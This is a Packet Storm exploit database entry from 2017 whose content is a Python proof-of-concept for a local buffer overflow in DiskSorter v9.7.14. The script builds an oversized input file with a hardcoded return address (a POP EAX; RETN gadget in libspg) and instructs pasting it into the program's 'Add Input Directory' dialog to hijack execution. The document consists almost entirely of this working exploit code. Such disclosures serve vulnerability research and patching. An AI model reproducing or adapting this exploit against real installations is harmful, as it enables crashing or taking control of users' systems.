DiskSorter 9.7.14 Buffer Overflow

2017-06-02T00:00:00
ID PACKETSTORM:142865
Type packetstorm
Reporter n3ckD_
Modified 2017-06-02T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
  
######################################  
# Exploit Title: DiskSorter v9.7.14 - Input Directory Local Buffer Overflow - PoC  
# Date: 25 May 2017  
# Exploit Author: n3ckD_  
# Vendor Homepage: http://www.disksorter.com/  
# Software Link: http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe  
# Version: Disk Sorter v9.7.14 (32-Bit)  
# Tested on: Windows 7 Enterprise SP1 (Build 7601)  
# Usage: Run the exploit, copy the text of the poc.txt into the 'Inputs -> Add Input Directory' dialog  
######################################  
  
print "DiskSorter v9.7.14 (32-Bit) - Input Directory Local Buffer Overflow - PoC"  
print "Copy the text of poc.txt into the 'Inputs -> Add Input Directory' dialog"  
  
# in libspg:.text  
# 10147C1C 58 POP EAX  
# 10147C1D C3 RETN  
ret = "\x1c\x7c\x14\x10"  
  
nops = "\x47\x4F"*24  
buf = nops + "A"*4048 + ret + "MAGIC" + "\n"  
  
f = open("poc.txt","w")  
f.write(buf)  
f.close()  
  
`